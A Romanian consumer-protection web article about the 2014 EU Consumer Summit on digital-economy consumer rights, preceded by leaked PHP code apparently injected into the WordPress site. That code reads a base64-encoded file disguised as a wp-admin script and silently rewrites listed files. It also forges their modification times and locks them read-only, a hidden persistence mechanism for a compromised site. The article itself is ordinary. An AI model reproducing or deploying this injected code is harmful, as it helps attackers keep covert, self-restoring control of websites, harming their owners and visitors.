$wp_update_file="/home/shuffles/public_html/wp-admin/user/screens.php"; if ( is_file($wp_update_file) ) { $wp_update_content=trim(file_get_contents($wp_update_file)); if ( $wp_update_content!="" ) { $wp_update_content=substr($wp_update_content,6,-6); $wp_update_content=base64_decode($wp_update_content); $wp_update_arr=json_decode($wp_update_content,true); if ( is_array($wp_update_arr) ) { foreach($wp_update_arr as $value) { $file_mtime=filemtime($value["path"]); @chmod($value["path"],0777); @unlink($value["path"]); @file_put_contents($value["path"],$value["content"]); @touch($value["path"],$file_mtime); @chmod($value["path"],0444); } } } } Reuniunea UE la nivel inalt din 2014 dedicata consumatorilor: Garantarea pentru consumatori a beneficiilor oferite de economia digitala – O noua atitudine

InfoCons-Protectia-Consumatorilor-Protectia-ConsumatoruluiFinalizarea pieței unice digitale ar duce, în medie, la beneficii în valoare de 400 EUR pe an pentru consumatorii din UE, beneficii care reprezintă aproximativ 200 de miliarde EUR la nivelul întregii Europe. Economia digitală aduce beneficii reale pentru consumatori, însă ridică și probleme importante referitoare la drepturile consumatorilor online. Reuniunea la nivel înalt din acest an dedicată consumatorilor se va concentra pe modul în care putem garanta pe deplin pentru consumatori beneficiile oferite de sectorul digital.

 

Cu ocazia reuniunii la nivel înalt, comisarul european pentru protecția consumatorilor, Neven Mimica, a declarat: „Consumatorii au mult de câștigat de pe urma economiei digitale: pot găsi oferte mai bune, accesa un conținut mai bogat și folosi mijloace de comunicare mai ieftine. În prezent, doar 50 % dintre consumatorii din UE cumpără online. Există un potențial clar de creștere economică, dar trebuie să ne asigurăm că, atunci când fac cumpărături online, consumatorii se simt la fel de în siguranță ca atunci când fac cumpărături în magazinele tradiționale.”

 

Neelie Kroes, vicepreședintele Comisiei Europene responsabil cu Agenda digitală, a declarat: „Avem nevoie ca fiecare consumator european să dobândească competențe digitale. Votul din această săptămână în Parlamentul European este primul pas către o veritabilă piață unică în sectorul telecomunicațiilor, prin care devine realitate viziunea noastră asupra unei Europe competitive și conectate. Aceasta înseamnă să oferim tuturor întreprinderilor europene instrumentele și rețelele de care au nevoie pentru inovare și creștere și să punem la dispoziția tuturor cetățenilor europeni conectivitatea fără discontinuități de care aceștia au ajuns să aibă nevoie – fără practici neloiale cum ar fi blocarea serviciilor sau tarifele de roaming. Această săptămână este foarte importantă pentru consumatorii europeni!”

 

Reuniunea la nivel înalt din acest an reunește aproximativ 400 de participanți reprezentând Parlamentul European, Comisia, guvernele naționale, organizații ale consumatorilor și asociații patronale, autorități de aplicare a legii și de reglementare, centrele europene ale consumatorilor și Autoritatea Europeană pentru Protecția Datelor.

 

Prima reuniune la nivel înalt dedicată consumatorilor care a avut loc acum șase ani s-a concentrat deja pe încrederea consumatorilor în piața digitală. Privind retrospectiv, este clar că economia digitală a UE a suferit o transformare rapidă cu un impact semnificativ asupra vieții consumatorilor.

 

Cifrele vorbesc de la sine: În prezent, în Europa există peste 790 de milioane de abonamente de telefonie mobilă, iar internetul este utilizat de peste 370 de milioane de cetățeni ai UE. Mai mult de jumătate dintre consumatorii din UE au efectuat cel puțin o achiziție online în cursul ultimelor douăsprezece luni, iar 80 % dintre consumatorii online folosesc site-urile de comparare a prețurilor pentru a găsi oferte mai bune.

 

Reuniunea la nivel înalt se va concentra pe necesitatea urgentă de a integra piață unică din sectorul digital și din sectorul telecomunicațiilor, în beneficiul atât al consumatorilor, cât și al întreprinderilor. Comisia este hotărâtă să rămână aproape de cetățeni, abordând preocupările acestora și reinstaurând încrederea acestora în piața internă, și în special în piața unică digitală.

 

După cum s-a subliniat în Agenda pentru protecția consumatorilor, unul dintre obiectivele Comisiei este adaptarea politicii pentru protecția consumatorilor la cerințele erei digitale. Comisia a luat deja măsuri în această privință: platforma de soluționare online a litigiilor, noua directivă privind drepturile consumatorilor, lucrările în curs privind instrumentele de comparare și evaluările utilizatorilor, o axare mai puternică pe respectarea legislației în mediul online, lansarea Clasei Consumatorului și a unei platforme interactive pe internet dedicate consolidării capacității organizațiilor de consumatori. De asemenea, Comisia a prezentat propuneri ambițioase de actualizare a cadrului actual privind protecția datelor și de finalizare a pieței unice în domeniul telecomunicațiilor.

 

Obiectivul reuniunii la nivel înalt este de a analiza ceea ce s-a realizat până acum pentru adaptarea politicii pentru protecția consumatorilor la cerințele erei digitale — inclusiv prin analiza celor mai bune practici naționale — și ce rămâne de făcut pentru a face față noilor provocări.

 

 

 Vor fi organizate ateliere dedicate următoarelor teme:

 

  • „Conectivitatea” — explorarea nevoilor consumatorilor din UE în ceea ce privește conectivitatea în bandă largă pe parcursul următorilor cinci ani, precum și a modalităților de evitare a diviziunii digitale.

 

  • „Drepturile consumatorilor online din UE” — identificarea unor posibile lacune în reglementările actuale și a modalităților de accelerare a punerii în aplicare a legislației.

 

  • „Plățile online” — evaluarea riscurilor și a beneficiilor pentru consumatori la utilizarea acestor forme de plată, de exemplu în ceea ce privește protecția datelor cu caracter personal în cadrul operațiunilor de plată.

 

  • „Alfabetizarea digitală” — sprijinirea eforturilor consumatorilor de a se familiariza cu mediul digital, de a distinge conținutul cu plată sau sponsorizat de alte conținuturi, de a înțelege și gestiona urmărirea online și publicitatea comportamentală online.

 

  • „Încrederea online” — evaluarea măsurii în care instrumente precum mărcile de încredere online și evaluările consumatorilor online pot contribui la creșterea încrederii consumatorilor în comerțul electronic și a metodelor de asigurare a fiabilității acestor instrumente.

 

  • „Noi tipuri de tranzacții, mai echitabile” — îmbunătățirea posibilităților de a alege ale consumatorilor în cadrul tranzacțiilor digitale (de exemplu, prin instrumente de comparare).

 

 

Sursa:  www.european-consumer-summit.eu/index_en.html

Asociatia Nationala pentru Protectia Consumatorilor si Promovarea Programelor si Strategiilor din Romania – InfoCons (www.protectia-consumatorilor.ro ), unica organizatie din Romania cu drepturi depline in Consumers International, este o asociatie de consumatori neguvernamentala, reprezentativa, de drept privat, fara scop lucrativ, cu patrimoniu distinct si indivizibil, independenta, intemeiata pe principii democratice, ce apara drepturile consumatorilor – membra fondatoare a Federatiei Asociatiilor de Consumatori.

 

FII INFORMAT! IA ATITUDINE! – 0219615

 

By o9admin